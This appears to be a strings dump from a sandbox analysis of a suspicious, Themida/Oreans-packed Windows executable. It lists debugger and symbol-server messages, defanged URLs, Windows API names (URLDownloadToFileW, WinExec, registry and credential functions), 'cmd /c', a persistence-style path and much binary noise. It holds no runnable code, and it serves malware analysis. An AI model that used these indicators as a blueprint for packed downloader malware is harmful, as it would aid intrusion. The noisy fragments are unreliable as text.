%s from %s: uncompressed
download.error
pingme.txt
%s - drive not ready
%s - access is denied
wantsptr.txt
index2.txt
flat.txt
%s?%s
symsrv.tmp
Exclusion section in %s is too large. Use the registry
%s is in the file exclusion list
symsrv.no
symsrv.yes
microsoft.com
SYMSRV: File: %s
SYMSRV: Get File Path: %s
SYMSRV: Connecting to the Server: %s.
Restarting connection to %s for %s
WinInet Interface using proxy server: %s
WinHttp interface using proxy server: %s
%s: 0x%x - %s
Server: '%s' Error
6.3.9600.16384 (debuggers(dbg).130821-1623)
symsrv.dll
Windows
Operating System
HTTP File Request
OverloadedOperator
HasAssignmentOperator
HasCastOperator
$T2 $esp = $T0 .raSearchStart = $eip $T0 ^ = $esp $T0 4   = $ebp $ebp = $ebx $ebx =
$T0 .raSearch = $eip $T0 ^ = $esp $T0 4   =
$T0 .raSearch 4 - = $ebp $T0 ^ = $eip $T0 4   ^ = $esp $T0 8   =
$T2 $esp = $T0 .raSearchStart =
' line %d)
SYMSRV.DLL*
The module signature does not match with .pdb signature
Unable to locate the .pdb file in any of the symbol search path locations.
Unable to locate the .pdb file in any of the symbol search
This error indicates attempting to access a .pdb file with
The .pdb file contains a corrupted debug codeview information.
You may be attempting to access a .pdb file with read-only attributes
or you do not have access permission to the .pdb location.
This error indicates a .pdb file related failure.
The module signature does not match with .pdb signature.
The module age and .pdb age do not match.
Invalid executable image
The image has not been recognized as a valid executable.
Unable to locate the .pdb file in this location
in the symbol search path (.sympath).
the requested password input.
is an invalid UNC store (an invalid path or the pingme.txt file is
or there is an invalid store type (other than UNC/http/https).
The SYMSRV client failed while reading/parsing the file.ptr file
The operation timed out
The URL does not use a recognized protocol
An extended error was returned from the WinHttp server
The .pdb file is probably no longer indexed in the symbol server share location.
The .sympath token is an invalid path, or you do not have
Symbol indexed but no file exists
The symbol server has never indexed any version of this symbol file
No version of the .pdb file with the given name has ever been registered.
This means that the file has not been indexed on the symbol server,
probably the file has been only indexed locally (no by the hXXp://symweb).
The symbol server has never indexed this version of this symbol file
Other versions of this symbol file have been indexed but this specific version has not.
Symbol expired - this symbol file was indexed but is no longer available
Symbol expired - this symbol file was previously indexed
The Symbol server sent an unknown failure message in the file.ptr - MSG: XXXX
Please contact the debugger team to report this error. (Mail: DAT-triage).
An Exception happened while downloading the module .pdb
No longer indexed
%s 0x%x - %s : %s
%s 0x%x - %s
%s - This error is unknown: 0x%x. Please contact the debugger team to report this error. (Mail: DAT-triage)
........ DIA E_PDB_FILE_SYSTEM error from %u
invalid executable image
pdb error 0x%x
dia error 0x%x
%s - %s
%s%s%s%s\*
%s%s%s%s\%s
%s%s%s%s\%s%s
Invalid path: '%s'
Ping command failed on: '%s'
The following %s did not respond and were excluded during symbol loading:
%-22.22s %s
Bin Path: %s
Symbol Path:%s
You should also verify that your symbol search path (.sympath) is correct.
Downloading symbols for [%s] %s
An Exception happened in the function GetPdbThreadProc(): 0x%x
%s%s%s
Error: Invalid Path length: %s.
Error: Unable to create the Image pdb data structure: '%s'
Error: Unable to create the validation thread for: '%s'
%s mismatched pdb for %s
........DeleteFile(%u,%ws)
........RemoveDirectory(%u,%ws)
%s %s
Symbol loading cancelled: %s
diaQueryInlineFrameTrace(%x,%u)(%I64x,%x,%u,%u,%u)(%I64x,%u,%u)
diaCompareInline(%d)(%I64x,%x)(%I64x)(%d,%d,%d)(%d,%d)
get_symTag(%x)
SYMSRV: %s is not a valid store
SYMSRV: %s needs a downstream store
SymSrv.dll load failure
DBGHELP_WINHTTP
Unable to find the SymbolServerWEx() function in srmsrv.dll. You should upgrade the symsrv.dll binary.
Unable to find the SymbolServerPingWEx() function in srmsrv.dll. You should upgrade the symsrv.dll binary.
\winxp\triage.ini
hXXp://symweb
hXXp://msdl.microsoft.com/download/symbols
*hXXp://symweb
*hXXp://msdl.microsoft.com/download/symbols
SymSrv load failure: %s
Can't use symbol server for %s - no header information available
%s*%s
srcsrv.dll
%s is not source indexed
Error 0x%x grabbing source in %s
Source server error - %s
Need a newer version of srcsrv.dll
Error 0x%x enumerating source tokens in %s
%s cached to %s
%s already cached
Failed copying the file '%s' to the cache
error 0x%x opening %s
new session: %s
%sDBG%d.tmp
_NT_SYMBOL_PATH: %s
_NT_ALT_SYMBOL_PATH: %s
Symbol Search Path: %s
SymAddrIncludeInlineTrace(%u,%I64x,%s)
SymAddrIncludeInlineTrace(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymAddrIncludeInlineTrace(Exception(%x),%I64x)
SymQueryInlineTrace(%c,%s)(%I64x,%x)(%I64x,%x,%u)
SymQueryInlineTrace(%c,%s)(%I64x,INLINE_FRAME_CONTEXT_IGNORE)(%I64x,%x,%u)
SymQueryInlineTrace(ERROR_INVALID_PROCESS,%I64x,%x,%I64x,%I64x)
SymQueryInlineTrace(Exception(%x),%I64x,%x,%I64x,%I64x)
SymCompareInlineTrace(%d,%I64x,%x,%I64x,%s)
SymCompareInlineTrace(%d)(%I64x,%x,%s,%I64x)(%I64x,%s,%I64x)
SymCompareInlineTrace(%d)(%I64x,%x,%I64x)(%I64x,%I64x)
SymCompareInlineTrace_Addr1(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace_RetAddr1(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace_Addr2(ERROR_MOD_LOAD_FAIL,%I64x,%s)
SymCompareInlineTrace(ERROR_INVALID_PROCESS,%I64x,%x,%I64x,%I64x,%I64x)
SymCompareInlineTrace(Exception(%x),%I64x,%x,%I64x)
%s - mismatched
%s - OK
%s - mismatched timestamp
%s - mismatched timestamp OK
%s found
%s not found in %s
%s%s%s.dbg
%ws%ws_XXXXXXXXXXX%X_X_XX
........CreateDirectory(%u,%ws)
%ws%ws_XXXXXXXXXXX%X_X_XX\%ws
........CopyFile(%u,%ws,%ws)
%s is already loaded at %I64x
No base address for %s: Please specify
No header for %s. Searching for image on disk
%s is stripped. Searching for dbg file
No header for %s. Searching for dbg file
No debug info for %s. Searching for dbg file
%s missing debug info. Searching for pdb anyway
coff symbols %s
cv symbols %s
private symbols %s
public symbols %s
, source indexed
, not source indexed
export symbols
MOD: %s
unrecognized OMF sig: %x %c%c%c%c
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix
%s%s%s%s
000000000
%ws.%ws,%u.%u.%u.%u
\StringFileInfo\xx\%s
DbsSplayTreeRangeMap::Add: ignoring zero-sized range at %s
DbsSplayTreeRangeMap::Add: range %s:%I64x overflows, truncating
DbsSplayTreeRangeMap::Add: Conflicting region %s - %s
Base relocation RVA %x not in image
Invalid relocation block size 0x%x
Unknown base relocation type %d
Base relocation entry RVA %x not in image
Raw relocation entry offset %x not in buffer
Map %s:
Image region %x:%x does not fit in mapping
Unable to map %s region at %s, %s
WARNING: Image %s section %d extends outside of image bounds
netmsg.dll
$T0 .raSearchStart = $eip $T0 ^ = $esp $T0 4   = $ebp $T0
Windows Image Helper
DBGHELP.DLL
5.1.0.0
HDPlug.dll
1, 0, 6, 6
- Skin.dll
windows dll Library
1, 4, 12, 723
windows.dll
Copyright (C) 2001-2012 windows Co.,Ltd.
windows
windows 7.dll

%original file name%.exe_1612_rwx_01220000_003DF000:




%System%\ADVAPI32.dll
%userappdata%\RestartApp.exe
Exit Status = %d
34$14$34$\
3<$1<$3<$\
%SGF)
&.NTZ
2^.lU
.kI50
34$14$34$
4$hN.Fe^
3,$1,$3,$\
|[=_34$14$34$
3<$1<$3<$
SER32.dll
ADVAPI32.dll
NTDLL.dll
]3<$1<$3<$
$T6s%X
3Cannot write oreans.vxd
\Oreans.vxd
$\3<$1<$3<$\
ADVAPI32.DLL
oreans32.sys
oreansx64.sys
\\.\oreans32
\\.\Global\oreans32
\\.\Global\oreansx64
%s\system32\drivers\%s
%s\syswow64\drivers\%s
%s\system32\drivers\oreans32.sys
3Cannot Update oreans.sys driver. Please, make sure that you have
3Cannot open oreans.vxd driver. Make sure that oreans.vxd
\\.\Oreans.vxd
%s\Oreans.vxd
contact info@oreans.com for this error
winmm.dll
^3<$1<$3<$\
CheckIN = %d
CheckOUT = %d
ProcIN = %d
ProcOUT = %d
ExitIN = %d
ExitOUT = %d
TPin = %d
HWIn = %d
IntV = %x, %x, %x, %x
3,$1,$3,$
^3<$1<$3<$
[^3<$1<$3<$
^3,$1,$3,$
3An internal exception occurred (Address: 0x%x)
Please, contact yoursite@yoursite.com. Thank you!
|iY%f
$$34$14$34$
_3,$1,$3,$
.Ud<f
.PR`W_`aaZ
]34$14$34$\
<j %f
sTcP
_34$14$34$\
%original file name%.exe
3Cannot find '%s'. Please, re-install this application
]l5%f
.Rd?f
gl %f
hntdll.dll
$.rO~
WV.vB
}.SR)
}.SRX
h:\;C
kk&%f
<$\34$14$34$
]k.IA
3.iN>av
nÿ0s
oF.Bj
p6.Sq
nn|SH<BajY%f
[34$14$34$
(lj%f
M.NUY
6j&%f
5.II^
2PÚ
vX.Yv
6.qc5
7;.rf
14$34$14$
,$Ü>
&j6%f
[l7%f
[34$14$34$\
.aIo5
^3,$1,$3,$\
.Gi]A^
.Ut*^
Tl>%f
\l6%f
.MM^^
.dm,f
.RM^^
G.xP(Qv
%sSV^[ZX
1,$3,$1,$
.ed,f
.Td=f
]34$14$34$
/x.CD^
.OZw^
r@%U;^
4l^%f
$1u.wS
$%uRs
$1,$3,$1,$
MlE%f
.id(f
juM4g9%f
QlA%f
.OWp3
,j0%f
_1<$3<$1<$
]3<$1<$3<$\
_.Ucf
;j!%f
a.BWz
rl %f
`l2%f
ql!%f
.Sd>f
9.vnk#f
-le%f
$*l.CR
$-Y}S
[3<$1<$3<$
[3<$1<$3<$\
1<$3<$1<$
$h`.at
cl/%f
ayExE
.jd'f
!lq%f
Vl<%f
&?`%XS
[3,$1,$3,$\
w%UBg
fuH%S
q.bWM^
S.Bs4^
7l[%f
.sg=u^
0j,%f
.fd f
m.ed,f
NlD%f
Ç,f
[3,$1,$3,$
.bx0f
.jidj
Jj.CQ

%original file name%.exe_1612_rwx_01D30000_000F2000:




.text
`.data
.rsrc
@.reloc
ntdll.dll
KERNEL32.dll
BaseCleanupAppcompatCacheSupport
BaseInitAppcompatCacheSupport
BaseProcessInitPostImport
CallNamedPipeA
CallNamedPipeW
CmdBatNotification
ConnectNamedPipe
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeW
CreatePipe
DisconnectNamedPipe
GetCPFileNameFromRegistry
GetCPInfo
GetCPInfoExA
GetCPInfoExW
GetConsoleAliasExesA
GetConsoleAliasExesLengthA
GetConsoleAliasExesLengthW
GetConsoleAliasExesW
GetConsoleInputExeNameA
GetConsoleInputExeNameW
GetConsoleKeyboardLayoutNameA
GetConsoleKeyboardLayoutNameW
GetConsoleOutputCP
GetDefaultSortkeySize
GetLargestConsoleWindowSize
GetNamedPipeHandleStateA
GetNamedPipeHandleStateW
GetNamedPipeInfo
GetProcessHandleCount
GetProcessHeap
GetProcessHeaps
GetProcessShutdownParameters
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryW
PeekNamedPipe
RegisterWowExec
SetCPGlobal
SetConsoleInputExeNameA
SetConsoleInputExeNameW
SetConsoleKeyShortcuts
SetConsoleMaximumWindowSize
SetConsoleOutputCP
SetNamedPipeHandleState
SetProcessShutdownParameters
SetThreadExecutionState
TransactNamedPipe
VDMConsoleOperation
VDMOperationStarted
WaitNamedPipeA
WaitNamedPipeW
WinExec
NTDLL.RtlAddVectoredExceptionHandler
NTDLL.RtlDecodePointer
NTDLL.RtlDecodeSystemPointer
NTDLL.RtlDeleteCriticalSection
NTDLL.RtlEncodePointer
NTDLL.RtlEncodeSystemPointer
NTDLL.RtlEnterCriticalSection
NTDLL.RtlGetLastWin32Error
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
NTDLL.RtlReAllocateHeap
NTDLL.RtlSizeHeap
NTDLL.RtlInitializeSListHead
NTDLL.RtlInterlockedFlushSList
NTDLL.RtlInterlockedPopEntrySList
NTDLL.RtlInterlockedPushEntrySList
NTDLL.RtlLeaveCriticalSection
NTDLL.RtlQueryDepthSList
NTDLL.RtlRemoveVectoredExceptionHandler
NTDLL.RtlRestoreLastWin32Error
NTDLL.RtlCaptureContext
NTDLL.RtlCaptureStackBackTrace
NTDLL.RtlFillMemory
NTDLL.RtlMoveMemory
NTDLL.RtlUnwind
NTDLL.RtlZeroMemory
NTDLL.RtlSetCriticalSectionSpinCount
NTDLL.RtlSetLastWin32Error
NTDLL.RtlTryEnterCriticalSection
NTDLL.VerSetConditionMask
DirOperationControl
UrlCanonicalizeW
SHDeleteKeyW
PathCreateFromUrlW
SetProcessWindowStation
OpenWindowStationA
GetProcessWindowStation
EnumDesktopWindows
CloseWindowStation
twain_32.dll
Jt.HH;
midiOutShortMsg
SXS: %s() LdrFindOutOfProcessResource failed; nt status = lx
advapi32.dll
ReportEventW
RegSaveKeyW
RegSaveKeyExW
RegSaveKeyA
RegRestoreKeyW
RegQueryInfoKeyW
RegOpenKeyW
RegOpenKeyExW
RegOpenKeyExA
RegOpenKeyA
RegNotifyChangeKeyValue
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyExW
RegCloseKey
ElfReportEventW
CryptExportKey
CryptDestroyKey
\Device\NamedPipe\Win32Pipes.x.x
CM_Open_DevNode_Key
CryptCATCatalogInfoFromContext
SetPortW
EnumPrinterKeyW
EnumPortsW
DeletePrinterKeyW
DeletePortW
ConfigurePortW
AddPortW
ShellExecuteW
ShellExecuteExW
ShellExecuteExA
ShellExecuteA
SHFileOperationW
SHFileOperationA
FindExecutableW
FindExecutableA
ImportPrivacySettings
MprConfigTransportGetInfo
MprConfigTransportGetHandle
MprConfigTransportDelete
MprConfigTransportCreate
MprConfigInterfaceTransportRemove
MprConfigInterfaceTransportGetInfo
MprConfigInterfaceTransportGetHandle
MprConfigInterfaceTransportEnum
MprConfigInterfaceTransportAdd
MprAdminTransportCreate
MprAdminPortGetInfo
MprAdminPortEnum
MprAdminInterfaceTransportAdd
MimeOleParseMhtmlUrl
ImmGetVirtualKey
ImageGetCertificateHeader
ImageGetCertificateData
ImageEnumerateCertificates
GdiplusShutdown
|CAGetCertTypePropertyEx
CAGetCertTypeProperty
CAGetCertTypeKeySpec
CAGetCertTypeFlagsEx
CAGetCertTypeFlags
CAGetCertTypeExtensionsEx
CAGetCertTypeExtensions
CAGetCertTypeExpiration
CAGetCACertificate
CAFreeCertTypeProperty
CAFreeCertTypeExtensions
CAFindCertTypeByName
CAEnumNextCertType
CAEnumCertTypesForCAEx
CAEnumCertTypesForCA
CACountCertTypes
CACloseCertType
CACertTypeAccessCheck
ApphelpCheckExe
WZCPassword2Key
EapcfgNodeFromKey
SetupDiOpenDevRegKey
SetupDiCreateDevRegKeyW
SXS: %s() BasepSxsCreateStreams() failed
winlogon.EXE
PWVSSh
SXS: %s - Failing thread create because RtlActivateActivationContextEx() failed with status lx
SXS: %s - Failing thread create because RtlQueryInformationActivationContext() failed with status lx
SXS: %s - Failing thread create becuase NtQueryInformationThread() failed with status lx
u\SSh
kernel32: No mapping for ImageInformation.Machine == x
TermsrvLogInstallIniFile
TermsrvGetWindowsDirectoryW
TermsrvGetWindowsDirectoryA
SXS: %s failing because RtlQueryInformationActivationContext() returned status lx
SXS: %s - Failure getting active activation context; ntstatus lx
SXS: %s() LdrAccessOutOfProcessResource failed; nt status = lx
SXS: %s() LdrCreateOutOfProcessImage failed
SXS: %s() NtQueryInformationFile failed
SXS: %s() empty lpSource %ls
SXS: %s() Calling csrss server failed
SXS: %s() RtlMultiAppendUnicodeStringBuffer failed
SXS: %s() NtMapViewOfSection failed
SXS: %s() AssemblyDirectory is not null terminated
SXS: %s() BaseDllMapResourceIdW failed
SXS: %s() ACTCTX_FLAG_RESOURCE_NAME_VALID set but lpResourceName == 0
SXS: %s() Bad lpAssemblyDirectory %ls
SXS: %s() Bad lpSource PathType %ls, 0x%lx
SXS: %s() Bad lpAssemblyDirectory PathType %ls, 0x%lx
SXS: %s() bad wProcessorArchitecture 0x%x
SXS: Invalid parameter(s) passed to FindActCtxSection*()
->cbSize = %u
SXS: %s() CsrCaptureMessageMultiUnicodeStringsInPlace failed
QSSSSh
\twain_32.dll
ReportFault
SXS: %s() NtCreateSection() failed
SXS: %s() NtOpenFile(%wZ) failed
SXS: %s() Null %p or size 0x%lx too small
SXS: %s() Bad flags/size 0x%lx/0x%lx
.debug
.reloc
.rsrc1
|wzcsapi.dll
wzcdlg.dll
wtsapi32.dll
ws2_32.dll
wmvcore.dll
wmi.dll
wldap32.dll
wintrust.dll
winsta.dll
winspool.drv
winscard.dll
winmm.dll
wininet.dll
winhttp.dll
version.dll
uxtheme.dll
utildll.dll
usp10.dll
userenv.dll
user32.dll
urlmon.dll
tapi32.dll
syssetup.dll
sti.dll
shsvcs.dll
shlwapi.dll
shell32.dll
shdocvw.dll
sfc.dll
setupapi.dll
secur32.dll
scecli.dll
samlib.dll
rtutils.dll
rpcrt4.dll
regapi.dll
rasman.dll
rasdlg.dll
rasapi32.dll
query.dll
pstorec.dll
psapi.dll
printui.dll
powrprof.dll
pidgen.dll
pautoenr.dll
oleaut32.dll
oleacc.dll
ole32.dll
odbc32.dll
ocmanage.dll
ntmarta.dll
ntlsapi.dll
ntlanman.dll
ntdsapi.dll
ntdsa.dll
netshell.dll
netrap.dll
netplwiz.dll
netman.dll
netcfgx.dll
netapi32.dll
mswsock.dll
mssign32.dll
msrating.dll
msimg32.dll
msi.dll
mshtml.dll
msgina.dll
mscat32.dll
msacm32.dll
mprui.dll
mprapi.dll
mpr.dll
mobsync.dll
mlang.dll
lz32.dll
linkinfo.dll
keymgr.dll
kdcsvc.dll
iphlpapi.dll
inetcomm.dll
imm32.dll
imgutil.dll
imagehlp.dll
hnetcfg.dll
gdiplus.dll
gdi32.dll
esent.dll
efsadu.dll
duser.dll
dnsapi.dll
dhcpcsvc.dll
devmgr.dll
ddraw.dll
d3dxof.dll
cscdll.dll
cryptui.dll
crypt32.dll
credui.dll
comdlg32.dll
comctl32.dll
certcli.dll
cdfview.dll
cabinet.dll
browseui.dll
authz.dll
apphelp.dll
advpack.dll
activeds.dll
WinStationIsHelpAssistantSession
WinStationEnumerate_IndexedW
|UnlockUrlCacheEntryStream
UnlockUrlCacheEntryFileW
UnlockUrlCacheEntryFileA
SetUrlCacheEntryInfoW
SetUrlCacheEntryGroupW
SetUrlCacheConfigInfoA
RetrieveUrlCacheEntryStreamW
RetrieveUrlCacheEntryFileW
RetrieveUrlCacheEntryFileA
RegisterUrlCacheNotification
ReadUrlCacheEntryStream
LoadUrlCacheContent
IsHostInProxyBypassList
InternetShowSecurityInfoByURLW
InternetOpenUrlW
InternetOpenUrlA
InternetCreateUrlW
InternetCreateUrlA
InternetCrackUrlW
InternetCrackUrlA
InternetCombineUrlW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlA
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoW
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpEndRequestW
HttpEndRequestA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoExW
GetUrlCacheEntryInfoExA
GetUrlCacheEntryInfoA
GetUrlCacheConfigInfoW
GetUrlCacheConfigInfoA
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryA
FtpRenameFileA
FtpRemoveDirectoryA
FtpPutFileEx
FtpOpenFileW
FtpOpenFileA
FtpGetFileSize
FtpGetFileEx
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryA
FtpFindFirstFileW
FtpFindFirstFileA
FtpDeleteFileW
FtpDeleteFileA
FtpCreateDirectoryW
FtpCreateDirectoryA
FtpCommandA
FreeUrlCacheSpaceW
FindNextUrlCacheEntryW
FindNextUrlCacheEntryExW
FindNextUrlCacheEntryExA
FindNextUrlCacheEntryA
FindNextUrlCacheContainerW
FindNextUrlCacheContainerA
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryExW
FindFirstUrlCacheEntryExA
FindFirstUrlCacheEntryA
FindFirstUrlCacheContainerW
FindFirstUrlCacheContainerA
FindCloseUrlCache
DeleteUrlCacheGroup
DeleteUrlCacheEntryW
DeleteUrlCacheEntryA
DeleteUrlCacheContainerA
CreateUrlCacheGroup
CreateUrlCacheEntryW
CreateUrlCacheEntryA
CreateUrlCacheContainerW
CreateUrlCacheContainerA
CommitUrlCacheEntryW
CommitUrlCacheEntryA
|WinHttpSetTimeouts
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpenRequest
WinHttpOpen
WinHttpCrackUrl
WinHttpConnect
WinHttpCloseHandle
|UrlMkSetSessionOption
UrlMkGetSessionOption
URLOpenBlockingStreamW
URLDownloadToFileW
URLDownloadToCacheFileW
IsValidURL
GetMarkOfTheWeb
CreateURLMoniker
CoInternetParseUrl
CoInternetIsFeatureEnabledForUrl
CoInternetGetSecurityUrl
CoInternetCombineUrl
SceSetupUpdateSecurityKey
RasShareConnection
RasIsSharedConnection
DsMakePasswordCredentialsW
DsFreePasswordCredentials
|NetpUpgradePreNT5JoinInfo
NetUserChangePassword
NetUnjoinDomain
NetJoinDomain
NetGetJoinInformation
|SpcGetCertFromKey
GetCryptProvFromCert
FreeCryptProvFromCert
|ShowModelessHTMLDialog
MPRUI_DoPasswordDialog
PRShowSaveFromMsginaW
PRShowRestoreFromMsginaW
KRShowKeyMgr
GetUdpStatistics
GetTcpStatistics
|IcfGetOperationalMode
SetViewportOrgEx
SetViewportExtEx
JetMakeKey
CryptUIDlgViewCertificateW
CryptVerifyCertificateSignature
CryptSignAndEncodeCertificate
CryptMsgGetParam
CryptMsgGetAndVerifySigner
CryptMsgClose
CryptImportPublicKeyInfoEx
CryptImportPublicKeyInfo
CryptHashPublicKeyInfo
CryptExportPublicKeyInfo
CertVerifySubjectCertificateContext
CertVerifyCertificateChainPolicy
CertStrToNameW
CertSetCertificateContextProperty
CertRegisterPhysicalStore
CertRDNValueToStrW
CertOpenSystemStoreW
CertOpenStore
CertNameToStrW
CertGetPublicKeyLength
CertGetNameStringW
CertGetIssuerCertificateFromStore
CertGetEnhancedKeyUsage
CertGetCertificateContextProperty
CertGetCertificateChain
CertFreeCertificateContext
CertFreeCertificateChain
CertFreeCTLContext
CertFindSubjectInCTL
CertFindExtension
CertFindCertificateInStore
CertFindCTLInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCTLContext
CertDeleteCertificateFromStore
CertCreateCertificateContext
CertCreateCTLContext
CertControlStore
CertCompareCertificateName
CertCloseStore
CertAddCertificateContextToStore
CredUICmdLinePromptForCredentialsW
SSSSh
PSSSSSSh
t.PSW
mem16.dll
ImpersonateNamedPipeClient
VWSSh
t.hlt
hypertrm.exe"
hypertrm.exe
.exr (exception record)
.cxr (context record)
serialui.dll
mekr386.exe
PVWSSh
SXS: %s() BaseDllMapResourceIdA failed
-. "%ls" %ld
(LRU) (Exe Name) (FileSize)
Total Entries = 0x%x
xpsp2res.dll
xpsp3res.dll
?456789:;<=
!"#$%&'()* ,-./0123
|CertAutoEnrollment
VSSHP
NtQueryValueKey
NtOpenKey
NtFlushKey
NtSetValueKey
NtCreateKey
NtEnumerateKey
NtEnumerateValueKey
RtlFormatCurrentUserKeyPath
NtQueryKey
NtDeleteValueKey
RtlGetProcessHeaps
NtCreateNamedPipeFile
NtSetThreadExecutionState
LdrQueryImageFileExecutionOptions
NtDelayExecution
NtYieldExecution
kernel32.pdb
0!1'1;1|1
;,<0<8<<<
67
2,242<2}2@3
: :$:(:,:0:4:8:<:
8 8$8(8,8084888<8
< <$<(<,<0<4<8<<<@<]<
$0(040:0
<$=`=[?~?
1!202<2|2
4 4$4(4,4044484
sShortDate
win.ini
.Config
.Manifest
\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
\Windows
\NLS\NlsSectionSortkey
\system32\Apphelp.dll
\Registry\MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls
\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
ADVAPI32.DLL
\\.\MountPointManager
\Registry\Machine\System\CurrentControlSet\Services\Tcpip\Parameters
hotkey.%u %s
wowexec.pif
cmd /c
hotkey.
setup.exe
\DosDevices\pipe\
\\.\pipe\
\REGISTRY\USER\.DEFAULT
WUSER32.DLL
~RF%4x.TMP
netmsg.dll
pipe\
c:\temp\
EmbdTrst.DLL
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
%ws%u\DosDevices\%ws
WINDOWS
\\?\GLOBALROOT
Application.Manifest
"/\[]:|<> =;,?
\REGISTRY\Machine\Software\Microsoft\Windows NT\currentVersion\Time Zones
\Registry\Machine\Software\Policies\Microsoft\Windows\System
AppCertDlls
tsappcmp.dll
\inifile.upd
t\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
DRMHeader.SubscriptionContentID
DRMHeader.ContentDistributor
DRMHeader.SECURITYVERSION
DRMHeader.CID
DRMHeader.LAINFO
DRMHeader.KID
LicenseStateData.Transfer.NONSDMI
LicenseStateData.Transfer.SDMI
LicenseStateData.Print.redbook
LicenseStateData.Play
ActionAllowed.Backup
ActionAllowed.Transfer.NONSDMI
ActionAllowed.Transfer.SDMI
ActionAllowed.Print.redbook
ActionAllowed.Play
BaseLAURL
Transfer.NONSDMI
Transfer.SDMI
Print.redbook
Software\Microsoft\Windows NT\CurrentVersion\Time Zones
TimeZoneKeyName
PendingFileRenameOperations%d
PendingFileRenameOperations
%s\system32\
\system32\faultrep.dll
mwowcmdline
cmdline
CONSOLE.DLL
conime.exe
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console
\INF\INTL.INF
DNSAPI.DLL
cfgmgr32.dll
The operation completed successfully.
Not enough storage is available to complete this operation.
The process cannot access the file because another process has locked a portion of the file.
The request is not supported.
Windows cannot find the network path. Verify that the network path is correct and the destination computer is not busy or turned off. If Windows still cannot find the network path, contact your network administrator.
The specified server cannot perform the requested operation.
The specified network password is not correct.
The pipe has been ended.
The system does not support the command requested.
This function is not supported on this system.
The data area passed to a system call is too small.
Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O.
A JOIN or SUBST command cannot be used for a drive that contains previously joined drives.
An attempt was made to use a JOIN or SUBST command on a drive that has already been joined.
An attempt was made to use a JOIN or SUBST command on a drive that has already been substituted.
The system tried to delete the JOIN of a drive that is not joined.
The system tried to join a drive to a directory on a joined drive.
The system tried to join a drive to a directory on a substituted drive.
The system tried to SUBST a drive to a directory on a joined drive.
The system cannot perform a JOIN or SUBST at this time.
The system cannot join or substitute a drive to or for a directory on the same drive.
An attempt was made to join or substitute a drive for which a directory on the drive is the target of a previous substitute.
System trace information was not specified in your CONFIG.SYS file, or tracing is disallowed.
DosMuxSemWait did not execute; too many semaphores are already set.
The file system does not support atomic changes to the lock type.
The operating system cannot run %1.
The flag passed is not correct.
The operating system cannot run this application program.
The operating system is not presently configured to run this application.
The pipe state is invalid.
All pipe instances are busy.
The pipe is being closed.
No process is on the other end of the pipe.
The wait operation timed out.
The mounted file system does not support extended attributes.
The volume is too fragmented to complete this operation.
There is a process on other end of the pipe.
Waiting for a process to open the other end of the pipe.
The I/O operation has been aborted because of either a thread exit or an application request.
Overlapped I/O operation is in progress.
Error performing inpage operation.
The requested operation cannot be performed in full-screen mode.
The configuration registry key is invalid.
The configuration registry key could not be opened.
The configuration registry key could not be read.
The configuration registry key could not be written.
An I/O operation initiated by the registry failed unrecoverably. The registry could not read in, or write out, or flush, one of the files that contain the system's image of the registry.
Illegal operation attempted on a registry key that has been marked for deletion.
Cannot create a symbolic link in a registry key that already has subkeys or values.
Cannot create a stable subkey under a volatile parent key.
The account name is invalid or does not exist, or the password is invalid for the account name specified.
The executable program that this service is configured to run in does not implement the service.
A serial I/O operation was completed by another write to the serial port.
A serial I/O operation completed because the timeout period expired.
The floppy disk controller reported an error that is not recognized by the floppy disk driver.
While accessing the hard disk, a recalibrate operation failed, even after retries.
While accessing the hard disk, a disk operation failed even after retries.
An attempt was made to create more links on a file than the file system supports.
The specified program requires a newer version of Windows.
The specified program is not a Windows or MS-DOS program.
The specified program was written for an earlier version of Windows.
No application is associated with the specified file for this operation.
The message can be used only with synchronous operations.
The device has indicated that cleaning is required before further operations are attempted.
There was no match for the specified key in the index.
The point passed to GetMouseMovePoints is not in the buffer.
The format of the specified password is invalid.
The operation was canceled by the user.
The requested operation cannot be performed on a file with a user-mapped section open.
The network transport endpoint already has an address associated with it.
An operation was attempted on a nonexistent network connection.
An invalid operation was attempted on an active network connection.
The network location cannot be reached. For information about network troubleshooting, see Windows Help.
No service is operating at the destination network endpoint on the remote system.
The operation could not be completed. A retry should be performed.
The network address could not be used for the operation requested.
The operation being requested was not performed because the user has not been authenticated.
The operation being requested was not performed because the user has not logged on to the network.
An attempt was made to perform an initialization operation when initialization has already been completed.
This operation is supported only when you are connected to the server.
This operation is not supported on a Microsoft Small Business Server
The remote system is not available. For information about network troubleshooting, see Windows Help.
Windows cannot open this program because it has been prevented by a software restriction policy. For more information, open Event Viewer or contact your system administrator.
KDC certificate during smartcard logon.
The smartcard certificate used for authentication has been revoked.
An untrusted certificate authority was detected While processing the
smartcard certificate used for authentication. Please contact your system
The revocation status of the smartcard certificate used for
The smartcard certificate used for authentication was not trusted. Please
The smartcard certificate used for authentication has expired. Please
A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image.
No encryption key is available. A well-known encryption key was returned.
